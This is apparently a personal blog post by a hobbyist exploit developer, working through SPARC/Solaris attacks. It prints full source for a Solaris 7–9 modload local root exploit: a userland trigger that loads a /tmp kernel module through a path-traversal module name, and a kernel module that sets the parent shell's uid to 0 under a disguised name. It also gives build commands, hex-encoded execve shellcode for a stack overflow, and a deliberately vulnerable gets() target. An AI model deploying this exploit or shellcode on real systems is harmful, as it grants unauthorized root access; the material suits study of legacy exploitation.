Bazz's Code Developments

NX-stack bypass w(1) Local Root Exploit Realization <3 - Pt. 19

Woo-Hoo. I’m finally ready to release source code :D



Solaris 7 8 9 modload user upload kernel module

“The Shellcoder’s Handbook” comes supplied with a ready exploit against http://www.securitytracker.com/id/1008833
But, it has some problems. the kernel module compiling script is broken (needs -c flag), else it will bitch about _init and _fini being defined twice.. This script uses the Sun Studio (11) cc compiler, but gcc can be used too (untested). https://www.thc.org/papers/slkm-1.0.html suggests

gcc -D_KERNEL -DSVR4 -DSOL2 -O2 -c flkm.c 
ld -o flkm -r flkm.o

To test this exploit (which I did successfully, yes this code works as is), I had to back down my patches on my Solaris box.. There is no automatic tool to uninstall patch dependencies, so I built my own:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>

/* Sizes shared by doit() and main(): one line of command output, one shell
 * command, and the stack of commands that were blocked by a dependency and
 * must be retried once the blocking patch is gone. */
enum {
  LOGLINE_BYTES = 8192,   /* widest line of patchrm output we buffer */
  CMD_BYTES = 1024,       /* "patchrm <id>" command buffer */
  DEEP_SLOTS = 8192,      /* maximum nesting depth of patch dependencies */
  DEEP_SLOT_BYTES = 25    /* bytes per saved command, including the NUL */
};

char logtime_str[LOGLINE_BYTES];              /* last line read from the popen()ed command */
char mycmd[CMD_BYTES];                        /* command currently being run */
char deeplist[DEEP_SLOTS][DEEP_SLOT_BYTES];   /* deferred commands, popped by main() */
int curcount = 0;                             /* number of live entries in deeplist */

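/*
 * Run `cmd` through the shell and echo each line of its output.
 *
 * patchrm refuses to remove a patch that another patch depends on, printing
 * a line containing "required to be installed by patch <id>".  When such a
 * line is seen, `cmd` is pushed on deeplist so main() can retry it after the
 * blocker is gone, and a pointer to the 9-character <id> is returned.  The
 * pointer aliases the global logtime_str and is valid only until the next
 * call.  NULL means: the command could not be started, no dependency line
 * was printed, the id was malformed, or the retry stack had no room.
 */
char *doit(char *cmd)
{
  static const char marker[] = "required to be installed by patch ";
  const size_t id_len = 9;               /* patch ids look like 108528-29 */
  char *found = NULL;
  FILE *fp;

  /* Open the command for reading. */
  fp = popen(cmd, "r");
  if (fp == NULL) {
    printf("Failed to run command\n" );
    return NULL;
  }

  /* Read the output a line at a time - output it. */
  while (fgets(logtime_str, sizeof(logtime_str)-1, fp) != NULL) {
    char *str;
    size_t i;

    printf("%s", logtime_str);
    str = strstr(logtime_str, marker);
    if (str == NULL)
      continue;

    str += sizeof marker - 1;
    if (strlen(str) < id_len)
      break;                             /* line cut short: no usable id */
    str[id_len] = 0;

    /* main() feeds this id straight back into a shell command, so accept
     * only the digits and '-' a patch id is made of. */
    for (i = 0; i < id_len; i++) {
      if (!((str[i] >= '0' && str[i] <= '9') || str[i] == '-'))
        break;
    }
    if (i != id_len)
      break;

    /* Remember the command we were running so main() can retry it.
     * Slots are 25 bytes wide; refuse rather than overflow one. */
    if (curcount >= (int)(sizeof deeplist / sizeof deeplist[0]) ||
        strlen(cmd) >= sizeof deeplist[0]) {
      printf("cannot defer '%s': retry stack full or command too long\n", cmd);
      break;
    }
    snprintf(deeplist[curcount++], sizeof deeplist[0], "%s", cmd);
    found = str;
    break;
  }

  /* The original never closed the pipe: every dependency level leaked a
   * FILE and left a zombie behind.  pclose() also reaps the child. */
  pclose(fp);
  return found;
}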

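/*
 * Entry point: `a.out <patch-id>`.
 *
 * Runs "patchrm <patch-id>".  Whenever patchrm refuses because another patch
 * depends on the one being removed, doit() hands back that blocking id; we
 * remove the blocker first and then pop the deferred command off deeplist to
 * retry it.  The loop ends when a command completes without reporting a
 * further dependency and nothing is left on the stack.
 *
 * Caveat (unchanged from the original): if a blocking patch cannot actually
 * be removed, patchrm keeps reporting it and this loop never terminates.
 */
int main(int argc, char **argv)
{
  if (argc != 2) {
    fprintf(stderr, "usage: %s <patch-id>\n", argv[0]);
    exit(1);
  }

  printf ("Removing Patch %s", argv[1]);
  /* argv[1] is user supplied and ends up in a shell command via popen():
   * bound the copy so a long argument cannot overrun mycmd. */
  if (snprintf(mycmd, sizeof mycmd, "patchrm %s", argv[1]) >= (int)sizeof mycmd) {
    fprintf(stderr, "\npatch id too long\n");
    exit(1);
  }

  while (1)
  {
    char *newstr = doit(mycmd);
    if (newstr)
    {
      /* newstr is a 9-character id inside a global buffer; it always fits. */
      snprintf(mycmd, sizeof mycmd, "patchrm %s", newstr);
      printf ("%s\n", mycmd);
      printf ("Removing Patch %s", mycmd);
    }
    else if (curcount)
    {
      /* Blocker handled (or nothing reported): retry the deferred command. */
      curcount--;
      snprintf(mycmd, sizeof mycmd, "%s", deeplist[curcount]);
      memset(deeplist[curcount], 0, sizeof deeplist[curcount]);
    }
    else
      break;
  }
  return 0;
}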

in my case, I needed to uninstall 108528-29, and there were a lot of nested dependencies involved, ALL having to be uninstalled manually without this tool above.. So now I just do:

./a.out 108528-29

And BAM.. auto uninstall..

WARNING: Back-pedaling thru patches is dangerous!! My SSHD doesn’t work correctly now :[ So now I’m reinstalling the patch cluster x.x

Now, the source code to the exploit… Since this source code was not found anywhere, I had to transcribe it all myself…

o0o0.c

#include <stdio.h>
#include <sys/fstyp.h>
#include <sys/fsid.h>
#include <sys/systeminfo.h>

/* int sysfs(int opcode, const char *fsname); */

/*
 * Userland half of the exploit from The Shellcoder's Handbook.
 *
 * What it does, in order: asks sysinfo(SI_ISALIST) whether a sparcv9
 * (64-bit) instruction set is listed, reads and prints the release string
 * (otherwise unused here), copies the prebuilt module o032/o064 into /tmp,
 * and then calls sysfs(GETFSIND, ...) with a "filesystem name" that is really
 * a relative path.  The module (moka.c) does the credential change; this
 * program only triggers the load and afterwards deletes its copy from /tmp.
 *
 * Notes for the reader: the return value of sysfs() is ignored; every error
 * path exits with status 0; memset/strstr/system/mkdir/exit are used without
 * <string.h>, <stdlib.h> or <sys/stat.h>; and main() has no final return.
 * The author states above that the host had to be back-levelled to a kernel
 * without the vendor patch before this worked.
 */
int main(int argc, char **argv)
{
  char modname[] = "../../../tmp/o0";   /* relative path with ".." components */
  char buf[4096];
  char ver[32], *ptr;
  int sixtyfour = 0;                    /* 1 when "sparcv9" is in the ISA list */

  memset((char *) buf, 0x00, 4096);
  if (sysinfo(SI_ISALIST, (char *) buf, 4095) < 0)
  {
    perror("sysinfo");
    exit (0);                           /* NB: exits 0 on failure */
  }

  if (strstr(buf, "sparcv9"))
    sixtyfour = 1;

  memset( (char *) ver, 0x00, 32);
  if (sysinfo(SI_RELEASE, (char *) ver, 32) < 0)
  {
    perror("sysinfo");
    exit (0);
  }

  /* Leave ptr on the part of the release string after the first dot. */
  ptr = (char *) strstr(ver, ".");
  if (!ptr)
  {
    fprintf(stderr, "can't grab release version!\n");
    exit (0);
  }
  ptr++;

  printf ("%s\n",ptr);                  /* printed only; not used below */
  //return 0;

  /* Pick the module built for this word size.  The commented-out ptr
   * argument suggests the destination once included the release number. */
  memset((char *) buf, 0x00, 4096);
  if (sixtyfour)
    snprintf(buf, sizeof(buf)-1, "cp ./o064 /tmp/sparcv9/o0"/*, ptr*/);
  else
    snprintf(buf, sizeof(buf)-1, "cp ./o032 /tmp/o0"/*, ptr*/);

  /* 64-bit modules go in a sparcv9 subdirectory — presumably mirroring the
   * kernel's own module search layout; confirm against the advisory. */
  if (sixtyfour)
  {
    if (mkdir("/tmp/sparcv9", 0755) < 0)
    {
      perror ("mkdir");
      exit(0);
    }
  }

  system(buf);
  sysfs(GETFSIND, modname);             /* the trigger; result not checked */

  /* Remove the staged module again. */
  if (sixtyfour)
    system("/usr/bin/rm -rf /tmp/sparcv9");
  else
    system("/usr/bin/rm -f /tmp/o0");
}

moka.c

#include <sys/systm.h>
#include <sys/ddi.h>
#include <sys/sunddi.h>
#include <sys/cred.h>
#include <sys/types.h>
#include <sys/proc.h>
#include <sys/procfs.h>
#include <sys/kmem.h>
#include <sys/errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/modctl.h>

extern struct mod_ops mod_miscops;

int g3mm3(void);

/*
 * Kernel side of the exploit: scan the process table and, for every process
 * whose command name contains "o0o0" (the userland driver above), replace
 * the PARENT process's credential with a copy whose cr_uid is 0.  The parent
 * is normally the shell that launched o0o0, so that shell ends up as root.
 *
 * Locking as written: pidlock for the whole walk, then each parent's
 * p_crlock around the cred swap.  Only cr_uid is modified; every other
 * field is whatever crcopy_to() carried over from the old cred.
 * Always returns 1.
 *
 * Detection note: the observable behaviour is a misc module, loaded from a
 * path under /tmp, that rewrites p_cred of an unrelated process from its
 * _init — not anything the userland program itself does.
 */
int g3mm3()
{
  register proc_t *p;
  register proc_t *pp;
  cred_t *cr, *newcr;

  mutex_enter(&pidlock);
  for (p=practive; p!=NULL; p = p->p_next)
  {
    /* Substring match on the (truncated) command name, so any process
     * whose name contains "o0o0" qualifies, not just an exact match. */
    if (strstr(p->p_user.u_comm, (char *) "o0o0"))
    {
      pp = p->p_parent;
      newcr = crget();

      mutex_enter(&pp->p_crlock);
      cr = pp->p_cred;
      crcopy_to(cr,newcr);
      pp->p_cred = newcr;
      newcr->cr_uid = 0;                /* the only field changed */
      mutex_exit(&pp->p_crlock);
    }
    continue;                           /* no-op: loop continues anyway */
  }
  mutex_exit(&pidlock);

  return 1;
}

/* Linkage records handed to mod_install()/mod_remove()/mod_info(): a "misc"
 * module (no driver or filesystem ops) that reports its name as "u_comm" —
 * a string that reads like a kernel field rather than a module name,
 * presumably so it passes unnoticed in modinfo output. */
static struct modlmisc modlmisc = 
{
  &mod_miscops,
  "u_comm"
};

static struct modlinkage modlinkage = 
{
  MODREV_1,
  (void *) &modlmisc,
  NULL
};

/* Module entry point.  Registers the linkage, then runs g3mm3() and returns
 * ITS result (always 1) — the mod_install() status is only used for the
 * optional debug message, so the loader is told the load failed even when
 * it succeeded.  Presumably deliberate: the cred change has already
 * happened by then; confirm against the loader's handling of nonzero. */
int _init(void)
{
  int rc = mod_install(&modlinkage);

#ifdef _DEBUG
  if (rc == 0)
    cmn_err(CE_NOTE, "o0o0o0o0 installed o0o0o0o0");
#endif

  rc = g3mm3();     /* install status discarded from here on */
  return rc;
}

/* Report module information to the loader via the shared linkage record. */
int _info(struct modinfo *modinfop)
{
  int rc = mod_info(&modlinkage, modinfop);
  return rc;
}

/* Module exit point: unregister the linkage and return mod_remove()'s
 * status unchanged (nonzero means the module stays loaded). */
int _fini(void)
{
  int rc = mod_remove(&modlinkage);

#ifdef _DEBUG
  if (rc == 0)
    cmn_err(CE_NOTE, "removed");
#endif

  return rc;
}

make_64.sh

# Build the 64-bit kernel module with Sun Studio cc in kernel mode (no
# application registers, no floating point, v9 ISA, _KERNEL), link it as a
# relocatable object and rename it to o064 — the file name o0o0.c copies into
# /tmp.  The -c flag is the fix mentioned in the text above.
/opt/SUNWspro/bin/cc -xCC -g -xregs=no%appl,no%float -xarch=v9 -DUSE_KERNEL_UTILS -D_KERNEL -D_B64 -c moka.c
ld -o moka -r moka.o
rm moka.o
mv moka o064
# Userland trigger, built with gcc.
gcc -o o0o0 o0o0.c
# Strip symbols from both artifacts.
/usr/ccs/bin/strip o0o0 o064

Note: There were inconsistencies with the source code that I took care of.. Apparently the writers of the Shellcoder’s Handbook didn’t give 2 fucks about this one…



Holy Mother of Pearl – Pt. II

Now let’s start perfecting our exploit:

STACK RANGE
0xFFBEE000
.
. 0xFFBEE800
.
. 0xFFBEF000
.
. 0xFFBEF800
.
0xFFBF0000

The above is the typical Stack range for a 32-bit sparc app in 64-bit kernel. That’s as specific as I care for.. We can create a guesser program to, based on nop-sled size, slice the bitspace into potential landing pads and call the vulnerable program for each landing pad until success.

Thus, this program will have the payload and be able to modify it as it goes.

given this line:

 ./build_shellcode_steps asmshell5_interactive.bin; ./alternating_payload3 338 >> payload; printf "\x41\x0a" >> payload

I have 338 bytes of nop slide goodness, 0x152. 8192 / 338 = 24.2 = 24. We can break the stack space into 24 chunks of potential zones where one of them will successfully execute the exploit. I’m assuming I have that many chances anyways..

Writing the automated Stack Shocker
Let me categorize our buffer:
[11111111111][fp][ra][2222222222222222222]
11111 and fp unchanged. ra is changed and 22222 is unchanged

I begin crafting my program.

-bash-4.3$ od -t x1 -A n payload
         01 41 41 41 01 42 42 42 01 43 43 43 01 44 44 44
         01 45 45 45 01 46 46 46 01 47 47 47 01 48 48 48
         01 49 49 49 01 4a 4a 4a 01 4b 4b 4b 01 4c 4c 4c
         01 4d 4d 4d 01 4e 4e 4e 01 4f 4f 4f 01 50 50 50
         01 51 51 51 01 52 52 52 01 53 53 53 01 54 54 54
         01 55 55 55 01 56 56 56 01 57 57 57 01 58 58 58
         01 59 59 59 01 5a 5a 5a 02 41 41 41 02 42 42 42
         02 43 43 43 02 44 44 44 02 45 45 45 02 46 46 46
         02 47 47 47 02 48 48 48 02 49 49 49 02 4a 4a 4a
         02 4b 4b 4b 02 4c 4c 4c 02 4d 4d 4d 02 4e 4e 4e
         02 4f 4f 4f 02 50 50 50 02 51 51 51 02 52 52 52
         02 53 53 53 02 54 54 54 02 55 55 55 02 56 56 56
         02 57 57 57 02 58 58 58 02 59 59 59 02 5a 5a 5a
         03 41 41 41 03 42 42 42 03 43 43 43 03 44 44 44
         03 45 45 45 03 46 46 46 03 47 47 47 03 48 48 48
         03 49 49 49 03 4a 4a 4a 03 4b 4b 4b 03 4c 4c 4c
         03 4d 4d 4d 03 4e 4e 4e 03 4f 4f 4f 03 50 50 50
         03 51 51 51 03 52 52 52 03 53 53 53 03 54 54 54
         03 55 55 55 03 56 56 56 03 57 57 57 03 58 58 58
         03 59 59 59 03 5a 5a 5a 04 41 41 41 04 42 42 42
         04 43 43 43 04 44 44 44 ff be fe 68 ff be fe 50
         11 0b d8 9a 90 12 21 6e d0 23 a0 54 11 0b dc da
         d0 23 a0 58 11 0b 5a 40 d0 23 a0 5c c0 23 a0 60
         90 03 a0 54 d0 23 a0 48 90 03 a0 5c d0 23 a0 4c
         c0 23 a0 50 90 03 a0 54 92 03 a0 48 94 1b 40 0d
         82 10 20 3b 91 d0 20 08 90 1b 40 0d 82 10 20 01
         91 d0 20 08 0a

-bash-4.3$ od -t x1 -A n payload | sed 's/      //g'
 01 41 41 41 01 42 42 42 01 43 43 43 01 44 44 44
 01 45 45 45 01 46 46 46 01 47 47 47 01 48 48 48
 01 49 49 49 01 4a 4a 4a 01 4b 4b 4b 01 4c 4c 4c
 01 4d 4d 4d 01 4e 4e 4e 01 4f 4f 4f 01 50 50 50
 01 51 51 51 01 52 52 52 01 53 53 53 01 54 54 54
 01 55 55 55 01 56 56 56 01 57 57 57 01 58 58 58
 01 59 59 59 01 5a 5a 5a 02 41 41 41 02 42 42 42
 02 43 43 43 02 44 44 44 02 45 45 45 02 46 46 46
 02 47 47 47 02 48 48 48 02 49 49 49 02 4a 4a 4a
 02 4b 4b 4b 02 4c 4c 4c 02 4d 4d 4d 02 4e 4e 4e
 02 4f 4f 4f 02 50 50 50 02 51 51 51 02 52 52 52
 02 53 53 53 02 54 54 54 02 55 55 55 02 56 56 56
 02 57 57 57 02 58 58 58 02 59 59 59 02 5a 5a 5a
 03 41 41 41 03 42 42 42 03 43 43 43 03 44 44 44
 03 45 45 45 03 46 46 46 03 47 47 47 03 48 48 48
 03 49 49 49 03 4a 4a 4a 03 4b 4b 4b 03 4c 4c 4c
 03 4d 4d 4d 03 4e 4e 4e 03 4f 4f 4f 03 50 50 50
 03 51 51 51 03 52 52 52 03 53 53 53 03 54 54 54
 03 55 55 55 03 56 56 56 03 57 57 57 03 58 58 58
 03 59 59 59 03 5a 5a 5a 04 41 41 41 04 42 42 42
 04 43 43 43 04 44 44 44 ff be fe 68 ff be fe 50
 11 0b d8 9a 90 12 21 6e d0 23 a0 54 11 0b dc da
 d0 23 a0 58 11 0b 5a 40 d0 23 a0 5c c0 23 a0 60
 90 03 a0 54 d0 23 a0 48 90 03 a0 5c d0 23 a0 4c
 c0 23 a0 50 90 03 a0 54 92 03 a0 48 94 1b 40 0d
 82 10 20 3b 91 d0 20 08 90 1b 40 0d 82 10 20 01
 91 d0 20 08 0a

-bash-4.3$ od -t x1 -A n payload | sed 's/      //g' | sed 's/ /\\x/g'
\x01\x41\x41\x41\x01\x42\x42\x42\x01\x43\x43\x43\x01\x44\x44\x44
\x01\x45\x45\x45\x01\x46\x46\x46\x01\x47\x47\x47\x01\x48\x48\x48
\x01\x49\x49\x49\x01\x4a\x4a\x4a\x01\x4b\x4b\x4b\x01\x4c\x4c\x4c
\x01\x4d\x4d\x4d\x01\x4e\x4e\x4e\x01\x4f\x4f\x4f\x01\x50\x50\x50
\x01\x51\x51\x51\x01\x52\x52\x52\x01\x53\x53\x53\x01\x54\x54\x54
\x01\x55\x55\x55\x01\x56\x56\x56\x01\x57\x57\x57\x01\x58\x58\x58
\x01\x59\x59\x59\x01\x5a\x5a\x5a\x02\x41\x41\x41\x02\x42\x42\x42
\x02\x43\x43\x43\x02\x44\x44\x44\x02\x45\x45\x45\x02\x46\x46\x46
\x02\x47\x47\x47\x02\x48\x48\x48\x02\x49\x49\x49\x02\x4a\x4a\x4a
\x02\x4b\x4b\x4b\x02\x4c\x4c\x4c\x02\x4d\x4d\x4d\x02\x4e\x4e\x4e
\x02\x4f\x4f\x4f\x02\x50\x50\x50\x02\x51\x51\x51\x02\x52\x52\x52
\x02\x53\x53\x53\x02\x54\x54\x54\x02\x55\x55\x55\x02\x56\x56\x56
\x02\x57\x57\x57\x02\x58\x58\x58\x02\x59\x59\x59\x02\x5a\x5a\x5a
\x03\x41\x41\x41\x03\x42\x42\x42\x03\x43\x43\x43\x03\x44\x44\x44
\x03\x45\x45\x45\x03\x46\x46\x46\x03\x47\x47\x47\x03\x48\x48\x48
\x03\x49\x49\x49\x03\x4a\x4a\x4a\x03\x4b\x4b\x4b\x03\x4c\x4c\x4c
\x03\x4d\x4d\x4d\x03\x4e\x4e\x4e\x03\x4f\x4f\x4f\x03\x50\x50\x50
\x03\x51\x51\x51\x03\x52\x52\x52\x03\x53\x53\x53\x03\x54\x54\x54
\x03\x55\x55\x55\x03\x56\x56\x56\x03\x57\x57\x57\x03\x58\x58\x58
\x03\x59\x59\x59\x03\x5a\x5a\x5a\x04\x41\x41\x41\x04\x42\x42\x42
\x04\x43\x43\x43\x04\x44\x44\x44\xff\xbe\xfe\x68\xff\xbe\xfe\x50
\x11\x0b\xd8\x9a\x90\x12\x21\x6e\xd0\x23\xa0\x54\x11\x0b\xdc\xda
\xd0\x23\xa0\x58\x11\x0b\x5a\x40\xd0\x23\xa0\x5c\xc0\x23\xa0\x60
\x90\x03\xa0\x54\xd0\x23\xa0\x48\x90\x03\xa0\x5c\xd0\x23\xa0\x4c
\xc0\x23\xa0\x50\x90\x03\xa0\x54\x92\x03\xa0\x48\x94\x1b\x40\x0d
\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\x40\x0d\x82\x10\x20\x01
\x91\xd0\x20\x08\x0a

further continuing this:

-bash-4.3$ od -t x1 -A n payload | sed 's/      //g' | sed 's/ /\\x/g' | sed 's/^/"/g' | sed 's/$/"/g'
"\x01\x41\x41\x41\x01\x42\x42\x42\x01\x43\x43\x43\x01\x44\x44\x44"
"\x01\x45\x45\x45\x01\x46\x46\x46\x01\x47\x47\x47\x01\x48\x48\x48"
"\x01\x49\x49\x49\x01\x4a\x4a\x4a\x01\x4b\x4b\x4b\x01\x4c\x4c\x4c"
"\x01\x4d\x4d\x4d\x01\x4e\x4e\x4e\x01\x4f\x4f\x4f\x01\x50\x50\x50"
"\x01\x51\x51\x51\x01\x52\x52\x52\x01\x53\x53\x53\x01\x54\x54\x54"
"\x01\x55\x55\x55\x01\x56\x56\x56\x01\x57\x57\x57\x01\x58\x58\x58"
"\x01\x59\x59\x59\x01\x5a\x5a\x5a\x02\x41\x41\x41\x02\x42\x42\x42"
"\x02\x43\x43\x43\x02\x44\x44\x44\x02\x45\x45\x45\x02\x46\x46\x46"
"\x02\x47\x47\x47\x02\x48\x48\x48\x02\x49\x49\x49\x02\x4a\x4a\x4a"
"\x02\x4b\x4b\x4b\x02\x4c\x4c\x4c\x02\x4d\x4d\x4d\x02\x4e\x4e\x4e"
"\x02\x4f\x4f\x4f\x02\x50\x50\x50\x02\x51\x51\x51\x02\x52\x52\x52"
"\x02\x53\x53\x53\x02\x54\x54\x54\x02\x55\x55\x55\x02\x56\x56\x56"
"\x02\x57\x57\x57\x02\x58\x58\x58\x02\x59\x59\x59\x02\x5a\x5a\x5a"
"\x03\x41\x41\x41\x03\x42\x42\x42\x03\x43\x43\x43\x03\x44\x44\x44"
"\x03\x45\x45\x45\x03\x46\x46\x46\x03\x47\x47\x47\x03\x48\x48\x48"
"\x03\x49\x49\x49\x03\x4a\x4a\x4a\x03\x4b\x4b\x4b\x03\x4c\x4c\x4c"
"\x03\x4d\x4d\x4d\x03\x4e\x4e\x4e\x03\x4f\x4f\x4f\x03\x50\x50\x50"
"\x03\x51\x51\x51\x03\x52\x52\x52\x03\x53\x53\x53\x03\x54\x54\x54"
"\x03\x55\x55\x55\x03\x56\x56\x56\x03\x57\x57\x57\x03\x58\x58\x58"
"\x03\x59\x59\x59\x03\x5a\x5a\x5a\x04\x41\x41\x41\x04\x42\x42\x42"
"\x04\x43\x43\x43\x04\x44\x44\x44\xff\xbe\xfe\x68\xff\xbe\xfe\x50"
"\x11\x0b\xd8\x9a\x90\x12\x21\x6e\xd0\x23\xa0\x54\x11\x0b\xdc\xda"
"\xd0\x23\xa0\x58\x11\x0b\x5a\x40\xd0\x23\xa0\x5c\xc0\x23\xa0\x60"
"\x90\x03\xa0\x54\xd0\x23\xa0\x48\x90\x03\xa0\x5c\xd0\x23\xa0\x4c"
"\xc0\x23\xa0\x50\x90\x03\xa0\x54\x92\x03\xa0\x48\x94\x1b\x40\x0d"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\x40\x0d\x82\x10\x20\x01"
"\x91\xd0\x20\x08\x0a"
""
-bash-4.3$ od -t x1 -A n payload | sed 's/      //g' | sed 's/ /\\x/g' | sed 's/^/"/g' | sed 's/$/"/g' | sed 's/""//'
"\x01\x41\x41\x41\x01\x42\x42\x42\x01\x43\x43\x43\x01\x44\x44\x44"
"\x01\x45\x45\x45\x01\x46\x46\x46\x01\x47\x47\x47\x01\x48\x48\x48"
"\x01\x49\x49\x49\x01\x4a\x4a\x4a\x01\x4b\x4b\x4b\x01\x4c\x4c\x4c"
"\x01\x4d\x4d\x4d\x01\x4e\x4e\x4e\x01\x4f\x4f\x4f\x01\x50\x50\x50"
"\x01\x51\x51\x51\x01\x52\x52\x52\x01\x53\x53\x53\x01\x54\x54\x54"
"\x01\x55\x55\x55\x01\x56\x56\x56\x01\x57\x57\x57\x01\x58\x58\x58"
"\x01\x59\x59\x59\x01\x5a\x5a\x5a\x02\x41\x41\x41\x02\x42\x42\x42"
"\x02\x43\x43\x43\x02\x44\x44\x44\x02\x45\x45\x45\x02\x46\x46\x46"
"\x02\x47\x47\x47\x02\x48\x48\x48\x02\x49\x49\x49\x02\x4a\x4a\x4a"
"\x02\x4b\x4b\x4b\x02\x4c\x4c\x4c\x02\x4d\x4d\x4d\x02\x4e\x4e\x4e"
"\x02\x4f\x4f\x4f\x02\x50\x50\x50\x02\x51\x51\x51\x02\x52\x52\x52"
"\x02\x53\x53\x53\x02\x54\x54\x54\x02\x55\x55\x55\x02\x56\x56\x56"
"\x02\x57\x57\x57\x02\x58\x58\x58\x02\x59\x59\x59\x02\x5a\x5a\x5a"
"\x03\x41\x41\x41\x03\x42\x42\x42\x03\x43\x43\x43\x03\x44\x44\x44"
"\x03\x45\x45\x45\x03\x46\x46\x46\x03\x47\x47\x47\x03\x48\x48\x48"
"\x03\x49\x49\x49\x03\x4a\x4a\x4a\x03\x4b\x4b\x4b\x03\x4c\x4c\x4c"
"\x03\x4d\x4d\x4d\x03\x4e\x4e\x4e\x03\x4f\x4f\x4f\x03\x50\x50\x50"
"\x03\x51\x51\x51\x03\x52\x52\x52\x03\x53\x53\x53\x03\x54\x54\x54"
"\x03\x55\x55\x55\x03\x56\x56\x56\x03\x57\x57\x57\x03\x58\x58\x58"
"\x03\x59\x59\x59\x03\x5a\x5a\x5a\x04\x41\x41\x41\x04\x42\x42\x42"
"\x04\x43\x43\x43\x04\x44\x44\x44\xff\xbe\xfe\x68\xff\xbe\xfe\x50"
"\x11\x0b\xd8\x9a\x90\x12\x21\x6e\xd0\x23\xa0\x54\x11\x0b\xdc\xda"
"\xd0\x23\xa0\x58\x11\x0b\x5a\x40\xd0\x23\xa0\x5c\xc0\x23\xa0\x60"
"\x90\x03\xa0\x54\xd0\x23\xa0\x48\x90\x03\xa0\x5c\xd0\x23\xa0\x4c"
"\xc0\x23\xa0\x50\x90\x03\xa0\x54\x92\x03\xa0\x48\x94\x1b\x40\x0d"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\x40\x0d\x82\x10\x20\x01"
"\x91\xd0\x20\x08\x0a"

There is one problem. the payload.. it doesn’t have a nopsled..
each sparc instruction is 4 bytes and must be aligned properly.. word-aligned.
that means I really have 336 bytes to work with, 336/4 = 84 nop instructions.

i need a nop instruction:

# using the previous developed od2sc above.. 

bazz@life[pts/6][~/latest] printf ".globl main\nmain:\nxor %%g1,%%g1,%%g0\n" > /tmp/nop.S; buildsc /tmp/nop; od2sc /tmp/nop.bin
"\x80\x18\x40\x01"

Although this program doesn’t have to be made in C, I am now migrating it to C in anticipation of using it with a raw PTY in the remote exploit later on.. Actually. I just discovered that I can do the following:

bazz@life[pts/6][~/latest] (cat; cat payload cat)
dfd
dfd
AAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZAAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZAAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZAAABBBCCCDDD���h���P
                                                                                                                ؚ�!n�#�T
                                                                                                                       ���#�X
                                                                                                                             Z@�#�\�#�`��T�#�H�� �� ��#�P��T��H�
dfd
dfd
bazz@life[pts/6][~/latest]

After interacting with cat.. I can CTRL-D (not ctrl-C), and then the other program will run.. That’s great.. maybe I can make this whole exploit in bash after all… BUT! That wouldn’t allow a raw terminal session experience in the remote shell. Things like signals or CTRL-characters would be interpreted by the local shell in a “cat” session. Thus, I’m going for the C solution. Plus I just tried using expect, holy God, catting a binary string is impossible <_< of course I only spent 5 minutes on it! I have tools I can do this in seconds on :) I am running out.. time to call it a night. But before I do: TO-DO
1) in PTY:
Allocate signals:
1) Sending payload
2) Respawning target process w/ new return address in payload
Add logic:
deallocate signals when the exploit is successful and we are in the shell.
2) Write the NOP-sled adjusting logic in bash. We can Cify it later

TO BE CONTINUED


Holy Mother of Pearl — SPARC Exploitation Excerpts!

SO, back to exploiting the userland gets() function.

Vulnerable Test Prog

#include <stdio.h>
/* Return the current stack pointer so a run can be compared with gdb.
 * The asm copies %sp into %r1 and the function then falls off the end with
 * no return statement — undefined behaviour in C; whatever the compiler
 * happens to leave in the return register is what main() prints.  The
 * author's note below records that the register choice is fragile. */
unsigned long get_sp( void ) {
        __asm__("or %sp,%sp,%r1");
// %r1 may have to be %i0 in some circumstances?? weirdness..
}

/* Deliberately vulnerable target: gets() has no bound, so input longer than
 * buf runs past it and over the saved %fp/%i7 of this frame (the gdb dumps
 * below show exactly that).  Outside a test harness use
 * fgets(buf, sizeof buf, stdin), which stops at the buffer size. */
void copy( ){
        char buf[256];

        gets(buf);
}

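/* Print %sp (so a payload can be aimed at this run's stack) and then call the
 * overflowable copy(). */
int main( ) {
        unsigned long ret = get_sp();
        /* ret is unsigned long: %lx, not %x — a mismatched length modifier
         * is undefined and prints garbage on a 64-bit build. */
        fprintf (stderr, "sp = 0x%lx\n", ret);
        copy(  );
        return 0;
}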
$ gcc -g v.c -o v

This invoke script helps me keep the stack offset the same whether I run the program in GDB or not..
Note: it doesn’t work that well on my Sun Blade 150 but it works well at the school server…
invoke script

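#!/bin/bash
# invoke: run PROG with a scrubbed, fixed environment so stack addresses are
# the same inside and outside gdb.
#   -d            run under gdb
#   -t            run under gdb with the target's terminal on /tmp/gdb-debug-pty
#   -e KEY=VALUE  one extra environment variable for the target
# Usage: invoke [-d|-t] [-e KEY=VALUE] prog [args...]

# Start from known values: the original inherited gdb=/tty=/env= from the
# caller's environment, so an exported gdb=1 silently switched modes.
gdb=
tty=
env=

while getopts "dte:h?" opt ; do
  case "$opt" in
    h|\?)
      printf "usage: %s -e KEY=VALUE prog [args...]\n" "$(basename "$0")"
      exit 0
      ;;
    t)
      tty=1
      gdb=1
      ;;
    d)
      gdb=1
      ;;
    e)
      env=$OPTARG
      ;;
  esac
done

shift $((OPTIND - 1))
if [ $# -lt 1 ] ; then
  printf "usage: %s -e KEY=VALUE prog [args...]\n" "$(basename "$0")" >&2
  exit 1
fi
prog=$(readlink -f "$1")
shift

# $env is expanded only when set, so a missing -e does not become a stray
# empty argument to env(1).  TERM and PWD are pinned because the size of the
# environment shifts everything on the stack.
if [ -n "$gdb" ] ; then
  if [ -n "$tty" ]; then
    touch /tmp/gdb-debug-pty
    exec env - ${env:+"$env"} TERM=screen PWD="$PWD" /usr/local/gnu/bin/gdb -tty /tmp/gdb-debug-pty --args "$prog" "$@"
  else
    exec env - ${env:+"$env"} TERM=screen PWD="$PWD" /usr/local/gnu/bin/gdb --args "$prog" "$@"
  fi
else
  exec env - ${env:+"$env"} TERM=screen PWD="$PWD" "$prog" "$@"
fi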

I use the invoke script with absolute paths. Here’s an example:

/home/bazz/tools/tmp/latest/invoke2 v < super_payload_lol
